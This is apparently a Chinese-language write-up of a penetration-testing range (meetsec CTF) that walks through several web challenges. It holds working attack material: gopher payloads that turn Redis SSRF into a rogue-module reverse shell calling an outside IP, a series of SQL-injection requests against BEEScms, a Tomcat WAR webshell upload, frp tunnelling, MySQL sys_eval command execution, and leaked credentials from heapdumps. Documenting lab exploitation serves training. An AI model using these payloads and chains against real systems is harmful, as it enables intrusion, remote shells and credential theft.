没有web4和web8,web2的4没做出来。
web1
国光ssrf改版靶场
1
直接读取flag
3
使用file协议读取hosts
IP为172.18.240.5
dict探针内网主机开启常见端口
172.18.240.1:80
172.18.240.5:3306
172.18.240.1:3306
172.18.240.5:80
172.18.240.5:8080
172.18.240.1:8080
172.18.240.1:6379
172.18.240.7:80
172.18.240.5:6379
172.18.240.7:6379
172.18.240.7:3306
172.18.240.7:8080
172.18.240.7:6379 redis未授权
因为flag在其他主机上所以使用
gopher://172.18.240.7:6379/_flag
gopher://172.18.240.7:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
gopher://172.18.240.7:6379/_auth%2520root%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252089.117.123.135%25206668%250d%250aquit
gopher://172.18.240.7:6379/_auth%2520root%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.rev%252089.117.123.135%25205566%250d%250aquit
再反弹个稳定的
配置将frp传到靶机上
成功转发但是访问不了,不知道网卡还是什么原因
curl -O http://x.x.x.x:9910/frpc.toml
#frps.ini
[common]
bind_port = 7789
2
又想到用dict读文件,但是之前一直读不出来,后来想了想换个浏览器就读到。。。
dict://172.18.240.7:6379/key:*
dict://172.18.240.7:6379/get:flag
meetsec2{2b7cc5b73fe867cc83546583b858c8ab}
web2
weblogic,getshell后破解mysql密码
1
使用nmap扫了一下扫到了之前靶场就没必要扫了
weblogic默认端口7001,直接用工具打,既然成功了。。。
2
扫描到其他主机
172.25.20.12:3306
不想翻了,直接上传linpeas收集信息,哥斯拉编码出了点问题直接看有没有py,有py直接反弹pyshell
/usr/share/lintian/overrides/passwd
127.0.0.11:46775
172.16.10.8
172.25.20.10
没数据库泄露直接上传fscan扫内网
fscan -h 172.16.10.0/24,172.25.20.0/24
[*] WebTitle http://172.16.10.1 code:200 len:1925 title:Hello!
[*] WebTitle http://172.16.10.1:8081 code:200 len:11217 title:Apache Tomcat/10.1.28
[*] WebTitle http://172.16.10.1:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://172.16.10.1:8082 code:200 len:15928 title:BEES企业网站管理系统_企业建站系统_外贸网站建设_企业CMS_PHP营销企业网站
172.16.10.1:22 open
172.25.20.1:22 open
172.25.20.10:7001 open
172.16.10.1:80 open
172.16.10.1:7001 open
172.16.10.8:7001 open
172.16.10.1:6379 open
172.16.10.1:8082 open
172.16.10.1:8081 open
172.16.10.1:8848 open
重点目标
172.25.20.12:3306 open
看这些信息很眼熟,还好我先打的下面靶场不然就打偏了。根据靶场题目来看应该就是拿下3306靶场
再自己找找密码
grep -iR passw
找了半天发现weblogic的密码是加密的
{AES}ZhArsOkXPBA9AvAwRxNxpK4G0WlHlpNFBZVsu+PDlYU=
find / -name SerializedSystemIni.dat
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
爆了很多次没爆开
解开了这么多SerializedSystemIni.dat,具有迷惑性,但是之前那工具也用了这个SerializedSystemIni.dat base64编码的。
Meetsec#1024
使用frp转发
serverAddr = "x.x.x.x"
serverPort = 7000
[[proxies]]
name = "mysql"
type = "tcp"
localIP = "172.25.20.12"
localPort = 3306
remotePort = 9898
成功拿到flag
meetsec2{9fffac75c84bfc66fef4998f3574c6c8}
3
meetsec3{2e947aef43be6dc428a9c626ba7fb824}
select version();
select @@basedir;
select sys_eval("ifconfig");
select sys_eval("whoami");
select sys_eval("cat /flag");
4
想弹个shell的结果不行,想了想应该是不出网或者命令被限制,应该可以正向连接,由于在hw时间来不及了就没去验证了,有懂的师傅可以为我解惑。
web3
springboot框架headdump泄露
2
使用dirsearch扫目录
python38 dirsearch.py -e php -u http://119.45.198.10:22883/ --exclude-status 403,401
扫到了heapdump,使用heapdump工具提取到敏感信息
org.springframework.security.web.authentication.ui.DefaultLoginPageGeneratingFilter:
[oauth2LoginEnabled = false, formLoginEnabled = false, saml2LoginEnabled = false, logoutSuccessUrl = /login?logout]
org.springframework.security.authentication.dao.DaoAuthenticationProvider:
[hideUserNotFoundExceptions = true, userNotFoundEncodedPassword = {bcrypt}$2a$10$ONnSaC7OXAc/jlz6MGqc8et.dRN/oBt1PqhXNmRZLNUIx.U8Nt1/2]
org.springframework.security.provisioning.MutableUser:
[password = {noop}8kge78k#y%]
org.springframework.security.core.userdetails.User:
[password = {noop}8kge78k#y%, username = actuator]
org.springframework.boot.autoconfigure.security.SecurityProperties$User:
[password = 8kge78k#y%, passwordGenerated = false]
org.springframework.boot.autoconfigure.jdbc.DataSourceProperties:
[password = MeetSec@2nd!2022, url = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]
com.zaxxer.hikari.HikariDataSource:
[password = MeetSec@2nd!2022, jdbcUrl = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]
org.apache.catalina.startup.Tomcat:
[hostname = localhost]
使用navicat连接数据库拿到flag
1
再用工具搜到flag1
Web5
beescms SQL注入加后台文件上传getshell
cms直接输入admin找登录框,试了弱口令不行,但是burp插件看到有sql注入
user=admin'order by 5--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
user=admin' un union ion selselectect 1,2,3,4,5#&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
beescms
user=admin' and and updatexml(1,concat(0x7e,database()),3)--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
‘~bees_admin,bees_admin_group,bee’
user=admin' and and updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fro from m information_schema.tables wher where e table_schema like database()),0x7e),3)--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
~id,admin_name,admin_password,ad
user=admin' and and updatexml(1,concat(0x7e,(selselectect group_concat(column_name) fro from m information_schema.columns wher where e table_schema like database() and and table_name like 'bees_admin'),0x7e),3)--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
meetsec
user=admin' and and updatexml(1,concat(0x7e,(selselectect group_concat(admin_name) fro from m bees_admin),0x7e),3)--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
2446d54c2e68d221db9cff653b01a0e
user=admin' and and updatexml(1,concat(0x7e,(selselectect group_concat(admin_password) fro from m bees_admin),0x7e),3)--+&password=123123&code=45ad&submit=true&submit.x=2&submit.y=30
md5解码login123
登录后台找到上传点/admin/upload.php上传webshell,更改文件类型即可绕过文件上传
web6
tomcat后台爆破+后台上传文件getshell
爆破
设置base64编码并取消url编码
dG9tY2F0OnF3ZTEyMw==
tomcat:qwe123
生成webshell压缩为zip后改成war后缀上传
http://119.45.198.10:8081/123/123.jsp连接哥斯拉拿下flag
web7
redis未授权,使用info命令查看版本信息,4.0存在rce,可以使用现成的exp打,但是我先手搓了一下写不了定时任务,写不了sshkey,webshell找不到路径,后面去git上找rceexp直接拿下
想看看能不能提权的,很多命令不能用,也不通外网。GG
web9
nacos泄露shirokey
看到返回包有remeberme,应该是用了shiro,但是不是固定key爆破key没成功。
sql注入也没有
这里xray发现了一个可以未授权添加用户
post发包但是不行,应该还是shior
扫描指纹发现了这个nacos,扫目录都没扫出来。
弱口令进入后台nacos:nacos
找了一下nacos后台rce打不进去。工具爆yaml反序列化也打不进去。这靶场应该不是拿权限,而且这是两个靶机,应该是结合shiro的key,
一直点不开这个,我还以为是权限不行,想了想用其他浏览器打开结果能打开,应该是插件开太多了。早知道就不会去rce了。
这里暴露了shirokey,就有思路了。
